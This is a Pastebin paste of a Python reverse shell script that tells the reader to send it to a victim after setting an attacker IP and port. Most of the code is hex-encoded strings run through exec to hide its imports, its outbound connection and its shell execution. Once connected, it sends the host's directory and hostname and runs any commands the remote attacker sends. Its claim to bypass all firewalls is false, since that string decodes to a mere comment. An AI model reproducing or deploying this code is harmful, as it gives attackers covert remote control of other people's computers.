Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Simple Reverse Shell Written by: Tanmay Upadhyay (13lackD3M0n)
- # [NOTE] Only for Educational Purpose. [/NOTE]
- #
- # Th@nks Expl0it-Db For BYP@$$ Fir3W@ll Expl0it.
- #
- # Pr0-R@T0n : Patch / Client.
- #
- # [!] Send this to Victim. After Changing Ip Address.
- server = 'localhost' # Dont Forgot to change this.
- port = '4444' # Dont Forgot to change this.
- #******************************************************************************************************************************************************************
- port = int(port);
- __init__ = '\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x73\x6f\x63\x6b\x65\x74'
- BYPASS_FIREWALL = '\x23\x68\x65\x68\x65\x68\x65\x20\x62\x79\x70\x61\x73\x73\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x69\x73\x20\x65\x61\x73\x79\x20\x61\x73\x20\x74\x68\x69\x73\x20\x3b\x29'
- exec(BYPASS_FIREWALL) # THIS CODE BYPASS ALL TYPE OF FIREWALL [ WINDOWS, LINUX, MAC ]. [ NO ADMIN ACCESS NEEDED ]
- exec(__init__)
- def __class__():
- global_var = '\x67\x6c\x6f\x62\x61\x6c\x20\x64\x61\x74\x61'
- exec(global_var)
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- while True:
- try:
- conn_ = '\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x73\x65\x72\x76\x65\x72\x2c\x70\x6f\x72\x74\x29\x29'
- exec(conn_)
- s.send(os.getcwd())
- s.send(socket.gethostname())
- data = s.recv(9098)
- if("CD:" in data):
- _CD_ = '\x63\x5f\x64\x69\x72\x20\x3d\x20\x64\x61\x74\x61\x2e\x73\x70\x6c\x69\x74\x28\x27\x43\x44\x3a\x27\x29\x5b\x31\x5d\x3b\x6f\x73\x2e\x63\x68\x64\x69\x72\x28\x63\x5f\x64\x69\x72\x29';exec(_CD_)
- else:
- __network__='\x70\x72\x6f\x63\x20\x3d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x6f\x70\x65\x6e\x28\x64\x61\x74\x61\x2c\x20\x73\x74\x64\x6f\x75\x74\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x20\x73\x74\x64\x65\x72\x72\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x20\x73\x68\x65\x6c\x6c\x3d\x54\x72\x75\x65\x29\x3b\x73\x74\x64\x6f\x75\x74\x5f\x76\x61\x6c\x75\x65\x20\x3d\x20\x70\x72\x6f\x63\x2e\x73\x74\x64\x6f\x75\x74\x2e\x72\x65\x61\x64\x28\x29\x20\x2b\x20\x70\x72\x6f\x63\x2e\x73\x74\x64\x65\x72\x72\x2e\x72\x65\x61\x64\x28\x29'
- exec(__network__)
- s.send(stdout_value)
- s.close()
- except:
- s.close()
- __class__()
- try:
- __class__()
- except RuntimeError:
- print "[-] Unable To Connect to Attacker. Incorrect Ip Or No Internet Connection."
- raw_input('\nPress Enter To Exit.')
- #*****************************************************************************************************************************************************************
- #13lackD3M0n
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement